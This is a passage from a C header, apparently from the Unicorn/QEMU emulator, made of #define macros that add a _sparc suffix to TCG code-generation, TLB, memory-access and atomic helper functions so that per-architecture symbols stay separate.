tcg_malloc_internal_sparc #define tcg_pool_reset tcg_pool_reset_sparc #define tcg_context_init tcg_context_init_sparc #define tcg_tb_alloc tcg_tb_alloc_sparc #define tcg_prologue_init tcg_prologue_init_sparc #define tcg_func_start tcg_func_start_sparc #define tcg_set_frame tcg_set_frame_sparc #define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc #define tcg_temp_new_internal tcg_temp_new_internal_sparc #define tcg_temp_new_vec tcg_temp_new_vec_sparc #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_sparc #define tcg_temp_free_internal tcg_temp_free_internal_sparc #define tcg_const_i32 tcg_const_i32_sparc #define tcg_const_i64 tcg_const_i64_sparc 
#define tcg_const_local_i32 tcg_const_local_i32_sparc #define tcg_const_local_i64 tcg_const_local_i64_sparc #define tcg_op_supported tcg_op_supported_sparc #define tcg_gen_callN tcg_gen_callN_sparc #define tcg_op_remove tcg_op_remove_sparc #define tcg_emit_op tcg_emit_op_sparc #define tcg_op_insert_before tcg_op_insert_before_sparc #define tcg_op_insert_after tcg_op_insert_after_sparc #define tcg_cpu_exec_time tcg_cpu_exec_time_sparc #define tcg_gen_code tcg_gen_code_sparc #define tcg_gen_op1 tcg_gen_op1_sparc #define tcg_gen_op2 tcg_gen_op2_sparc #define tcg_gen_op3 tcg_gen_op3_sparc #define tcg_gen_op4 tcg_gen_op4_sparc #define tcg_gen_op5 tcg_gen_op5_sparc #define tcg_gen_op6 tcg_gen_op6_sparc #define tcg_gen_mb tcg_gen_mb_sparc #define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_sparc #define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc #define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc #define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc #define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc #define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc #define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc #define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_sparc #define tcg_gen_muli_i32 tcg_gen_muli_i32_sparc #define tcg_gen_div_i32 tcg_gen_div_i32_sparc #define tcg_gen_rem_i32 tcg_gen_rem_i32_sparc #define tcg_gen_divu_i32 tcg_gen_divu_i32_sparc #define tcg_gen_remu_i32 tcg_gen_remu_i32_sparc #define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_sparc #define tcg_gen_nand_i32 tcg_gen_nand_i32_sparc #define tcg_gen_nor_i32 tcg_gen_nor_i32_sparc #define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc #define tcg_gen_clz_i32 tcg_gen_clz_i32_sparc #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_sparc #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_sparc #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_sparc #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_sparc #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_sparc #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_sparc #define tcg_gen_extract_i32 tcg_gen_extract_i32_sparc #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_sparc #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_sparc #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc #define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_sparc #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_sparc #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc #define tcg_gen_smin_i32 tcg_gen_smin_i32_sparc #define tcg_gen_umin_i32 tcg_gen_umin_i32_sparc #define tcg_gen_smax_i32 tcg_gen_smax_i32_sparc #define tcg_gen_umax_i32 tcg_gen_umax_i32_sparc #define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc #define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc #define tcg_gen_subfi_i64 
tcg_gen_subfi_i64_sparc #define tcg_gen_subi_i64 tcg_gen_subi_i64_sparc #define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc #define tcg_gen_ori_i64 tcg_gen_ori_i64_sparc #define tcg_gen_xori_i64 tcg_gen_xori_i64_sparc #define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc #define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc #define tcg_gen_sari_i64 tcg_gen_sari_i64_sparc #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_sparc #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_sparc #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_sparc #define tcg_gen_muli_i64 tcg_gen_muli_i64_sparc #define tcg_gen_div_i64 tcg_gen_div_i64_sparc #define tcg_gen_rem_i64 tcg_gen_rem_i64_sparc #define tcg_gen_divu_i64 tcg_gen_divu_i64_sparc #define tcg_gen_remu_i64 tcg_gen_remu_i64_sparc #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_sparc #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_sparc #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_sparc #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_sparc #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_sparc #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_sparc #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_sparc #define tcg_gen_not_i64 tcg_gen_not_i64_sparc #define tcg_gen_andc_i64 tcg_gen_andc_i64_sparc #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_sparc #define tcg_gen_nand_i64 tcg_gen_nand_i64_sparc #define tcg_gen_nor_i64 tcg_gen_nor_i64_sparc #define tcg_gen_orc_i64 tcg_gen_orc_i64_sparc #define tcg_gen_clz_i64 tcg_gen_clz_i64_sparc #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_sparc #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_sparc #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_sparc #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_sparc #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_sparc #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_sparc #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_sparc #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_sparc #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_sparc #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_sparc #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_sparc #define tcg_gen_extract_i64 tcg_gen_extract_i64_sparc #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_sparc #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_sparc #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc #define tcg_gen_add2_i64 tcg_gen_add2_i64_sparc #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_sparc #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_sparc #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_sparc #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_sparc #define tcg_gen_smin_i64 tcg_gen_smin_i64_sparc #define tcg_gen_umin_i64 tcg_gen_umin_i64_sparc #define tcg_gen_smax_i64 tcg_gen_smax_i64_sparc #define tcg_gen_umax_i64 tcg_gen_umax_i64_sparc #define tcg_gen_abs_i64 tcg_gen_abs_i64_sparc #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_sparc #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_sparc #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_sparc #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_sparc #define tcg_gen_exit_tb tcg_gen_exit_tb_sparc #define tcg_gen_goto_tb tcg_gen_goto_tb_sparc #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_sparc #define check_exit_request check_exit_request_sparc #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc #define tcg_gen_qemu_st_i32 
tcg_gen_qemu_st_i32_sparc #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_sparc #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_sparc #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_sparc #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_sparc #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_sparc #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_sparc #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_sparc #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_sparc #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_sparc #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_sparc #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_sparc #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_sparc #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_sparc #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_sparc #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_sparc #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_sparc #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_sparc #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_sparc #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_sparc #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_sparc #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_sparc #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_sparc #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_sparc #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_sparc #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_sparc #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_sparc #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_sparc #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_sparc #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_sparc #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_sparc #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_sparc #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_sparc #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_sparc #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_sparc #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_sparc #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_sparc #define simd_desc simd_desc_sparc #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_sparc #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_sparc #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_sparc #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_sparc #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_sparc #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_sparc #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_sparc #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_sparc #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_sparc #define tcg_gen_gvec_2 tcg_gen_gvec_2_sparc #define tcg_gen_gvec_2i tcg_gen_gvec_2i_sparc #define tcg_gen_gvec_2s tcg_gen_gvec_2s_sparc #define tcg_gen_gvec_3 tcg_gen_gvec_3_sparc #define tcg_gen_gvec_3i tcg_gen_gvec_3i_sparc #define tcg_gen_gvec_4 tcg_gen_gvec_4_sparc #define tcg_gen_gvec_mov tcg_gen_gvec_mov_sparc #define 
tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_sparc #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_sparc #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_sparc #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_sparc #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_sparc #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_sparc #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_sparc #define tcg_gen_gvec_not tcg_gen_gvec_not_sparc #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_sparc #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_sparc #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_sparc #define tcg_gen_gvec_add tcg_gen_gvec_add_sparc #define tcg_gen_gvec_adds tcg_gen_gvec_adds_sparc #define tcg_gen_gvec_addi tcg_gen_gvec_addi_sparc #define tcg_gen_gvec_subs tcg_gen_gvec_subs_sparc #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_sparc #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_sparc #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_sparc #define tcg_gen_gvec_sub tcg_gen_gvec_sub_sparc #define tcg_gen_gvec_mul tcg_gen_gvec_mul_sparc #define tcg_gen_gvec_muls tcg_gen_gvec_muls_sparc #define tcg_gen_gvec_muli tcg_gen_gvec_muli_sparc #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_sparc #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_sparc #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_sparc #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_sparc #define tcg_gen_gvec_smin tcg_gen_gvec_smin_sparc #define tcg_gen_gvec_umin tcg_gen_gvec_umin_sparc #define tcg_gen_gvec_smax tcg_gen_gvec_smax_sparc #define tcg_gen_gvec_umax tcg_gen_gvec_umax_sparc #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_sparc #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_sparc #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_sparc #define tcg_gen_gvec_neg tcg_gen_gvec_neg_sparc #define tcg_gen_gvec_abs tcg_gen_gvec_abs_sparc #define tcg_gen_gvec_and tcg_gen_gvec_and_sparc #define tcg_gen_gvec_or tcg_gen_gvec_or_sparc #define tcg_gen_gvec_xor tcg_gen_gvec_xor_sparc #define tcg_gen_gvec_andc tcg_gen_gvec_andc_sparc #define tcg_gen_gvec_orc tcg_gen_gvec_orc_sparc #define tcg_gen_gvec_nand tcg_gen_gvec_nand_sparc #define tcg_gen_gvec_nor tcg_gen_gvec_nor_sparc #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_sparc #define tcg_gen_gvec_ands tcg_gen_gvec_ands_sparc #define tcg_gen_gvec_andi tcg_gen_gvec_andi_sparc #define tcg_gen_gvec_xors tcg_gen_gvec_xors_sparc #define tcg_gen_gvec_xori tcg_gen_gvec_xori_sparc #define tcg_gen_gvec_ors tcg_gen_gvec_ors_sparc #define tcg_gen_gvec_ori tcg_gen_gvec_ori_sparc #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_sparc #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_sparc #define tcg_gen_gvec_shli tcg_gen_gvec_shli_sparc #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_sparc #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_sparc #define tcg_gen_gvec_shri tcg_gen_gvec_shri_sparc #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_sparc #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_sparc #define tcg_gen_gvec_sari tcg_gen_gvec_sari_sparc #define tcg_gen_gvec_shls tcg_gen_gvec_shls_sparc #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_sparc #define tcg_gen_gvec_sars tcg_gen_gvec_sars_sparc #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_sparc #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_sparc #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_sparc #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_sparc #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_sparc #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_sparc #define vec_gen_2 vec_gen_2_sparc #define vec_gen_3 vec_gen_3_sparc 
#define vec_gen_4 vec_gen_4_sparc #define tcg_gen_mov_vec tcg_gen_mov_vec_sparc #define tcg_const_zeros_vec tcg_const_zeros_vec_sparc #define tcg_const_ones_vec tcg_const_ones_vec_sparc #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_sparc #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_sparc #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_sparc #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_sparc #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_sparc #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_sparc #define tcg_gen_dupi_vec tcg_gen_dupi_vec_sparc #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_sparc #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_sparc #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_sparc #define tcg_gen_ld_vec tcg_gen_ld_vec_sparc #define tcg_gen_st_vec tcg_gen_st_vec_sparc #define tcg_gen_stl_vec tcg_gen_stl_vec_sparc #define tcg_gen_and_vec tcg_gen_and_vec_sparc #define tcg_gen_or_vec tcg_gen_or_vec_sparc #define tcg_gen_xor_vec tcg_gen_xor_vec_sparc #define tcg_gen_andc_vec tcg_gen_andc_vec_sparc #define tcg_gen_orc_vec tcg_gen_orc_vec_sparc #define tcg_gen_nand_vec tcg_gen_nand_vec_sparc #define tcg_gen_nor_vec tcg_gen_nor_vec_sparc #define tcg_gen_eqv_vec tcg_gen_eqv_vec_sparc #define tcg_gen_not_vec tcg_gen_not_vec_sparc #define tcg_gen_neg_vec tcg_gen_neg_vec_sparc #define tcg_gen_abs_vec tcg_gen_abs_vec_sparc #define tcg_gen_shli_vec tcg_gen_shli_vec_sparc #define tcg_gen_shri_vec tcg_gen_shri_vec_sparc #define tcg_gen_sari_vec tcg_gen_sari_vec_sparc #define tcg_gen_cmp_vec tcg_gen_cmp_vec_sparc #define tcg_gen_add_vec tcg_gen_add_vec_sparc #define tcg_gen_sub_vec tcg_gen_sub_vec_sparc #define tcg_gen_mul_vec tcg_gen_mul_vec_sparc #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_sparc #define tcg_gen_usadd_vec tcg_gen_usadd_vec_sparc #define tcg_gen_sssub_vec tcg_gen_sssub_vec_sparc #define tcg_gen_ussub_vec tcg_gen_ussub_vec_sparc #define tcg_gen_smin_vec tcg_gen_smin_vec_sparc #define tcg_gen_umin_vec tcg_gen_umin_vec_sparc #define tcg_gen_smax_vec tcg_gen_smax_vec_sparc #define tcg_gen_umax_vec tcg_gen_umax_vec_sparc #define tcg_gen_shlv_vec tcg_gen_shlv_vec_sparc #define tcg_gen_shrv_vec tcg_gen_shrv_vec_sparc #define tcg_gen_sarv_vec tcg_gen_sarv_vec_sparc #define tcg_gen_shls_vec tcg_gen_shls_vec_sparc #define tcg_gen_shrs_vec tcg_gen_shrs_vec_sparc #define tcg_gen_sars_vec tcg_gen_sars_vec_sparc #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_sparc #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_sparc #define tb_htable_lookup tb_htable_lookup_sparc #define tb_set_jmp_target tb_set_jmp_target_sparc #define cpu_exec cpu_exec_sparc #define cpu_loop_exit_noexc cpu_loop_exit_noexc_sparc #define cpu_reloading_memory_map cpu_reloading_memory_map_sparc #define cpu_loop_exit cpu_loop_exit_sparc #define cpu_loop_exit_restore cpu_loop_exit_restore_sparc #define cpu_loop_exit_atomic cpu_loop_exit_atomic_sparc #define tlb_init tlb_init_sparc #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_sparc #define tlb_flush tlb_flush_sparc #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_sparc #define tlb_flush_all_cpus tlb_flush_all_cpus_sparc #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_sparc #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_sparc #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_sparc #define tlb_flush_page tlb_flush_page_sparc #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_sparc #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_sparc 
#define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_sparc #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_sparc #define tlb_protect_code tlb_protect_code_sparc #define tlb_unprotect_code tlb_unprotect_code_sparc #define tlb_reset_dirty tlb_reset_dirty_sparc #define tlb_set_dirty tlb_set_dirty_sparc #define tlb_set_page_with_attrs tlb_set_page_with_attrs_sparc #define tlb_set_page tlb_set_page_sparc #define get_page_addr_code_hostp get_page_addr_code_hostp_sparc #define get_page_addr_code get_page_addr_code_sparc #define probe_access probe_access_sparc #define tlb_vaddr_to_host tlb_vaddr_to_host_sparc #define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc #define helper_le_lduw_mmu helper_le_lduw_mmu_sparc #define helper_be_lduw_mmu helper_be_lduw_mmu_sparc #define helper_le_ldul_mmu helper_le_ldul_mmu_sparc #define helper_be_ldul_mmu helper_be_ldul_mmu_sparc #define helper_le_ldq_mmu helper_le_ldq_mmu_sparc #define helper_be_ldq_mmu helper_be_ldq_mmu_sparc #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc #define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc #define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc #define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc #define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_sparc #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_sparc #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_sparc #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_sparc #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_sparc #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_sparc #define cpu_ldub_data_ra cpu_ldub_data_ra_sparc #define cpu_ldsb_data_ra cpu_ldsb_data_ra_sparc #define cpu_lduw_data_ra cpu_lduw_data_ra_sparc #define cpu_ldsw_data_ra cpu_ldsw_data_ra_sparc #define cpu_ldl_data_ra cpu_ldl_data_ra_sparc #define cpu_ldq_data_ra cpu_ldq_data_ra_sparc #define cpu_ldub_data cpu_ldub_data_sparc #define cpu_ldsb_data cpu_ldsb_data_sparc #define cpu_lduw_data cpu_lduw_data_sparc #define cpu_ldsw_data cpu_ldsw_data_sparc #define cpu_ldl_data cpu_ldl_data_sparc #define cpu_ldq_data cpu_ldq_data_sparc #define helper_ret_stb_mmu helper_ret_stb_mmu_sparc #define helper_le_stw_mmu helper_le_stw_mmu_sparc #define helper_be_stw_mmu helper_be_stw_mmu_sparc #define helper_le_stl_mmu helper_le_stl_mmu_sparc #define helper_be_stl_mmu helper_be_stl_mmu_sparc #define helper_le_stq_mmu helper_le_stq_mmu_sparc #define helper_be_stq_mmu helper_be_stq_mmu_sparc #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_sparc #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_sparc #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_sparc #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_sparc #define cpu_stb_data_ra cpu_stb_data_ra_sparc #define cpu_stw_data_ra cpu_stw_data_ra_sparc #define cpu_stl_data_ra cpu_stl_data_ra_sparc #define cpu_stq_data_ra cpu_stq_data_ra_sparc #define cpu_stb_data cpu_stb_data_sparc #define cpu_stw_data cpu_stw_data_sparc #define cpu_stl_data cpu_stl_data_sparc #define cpu_stq_data cpu_stq_data_sparc #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_sparc #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_sparc #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_sparc #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_sparc #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_sparc #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_sparc #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_sparc #define helper_atomic_and_fetchb_mmu 
helper_atomic_and_fetchb_mmu_sparc #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_sparc #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_sparc #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_sparc #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_sparc #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_sparc #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_sparc #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_sparc #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_sparc #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_sparc #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_sparc #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_sparc #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_sparc #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_sparc #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_sparc #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_sparc #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_sparc #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_sparc #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_sparc #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_sparc #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_sparc #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_sparc #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_sparc #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_sparc #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_sparc #define 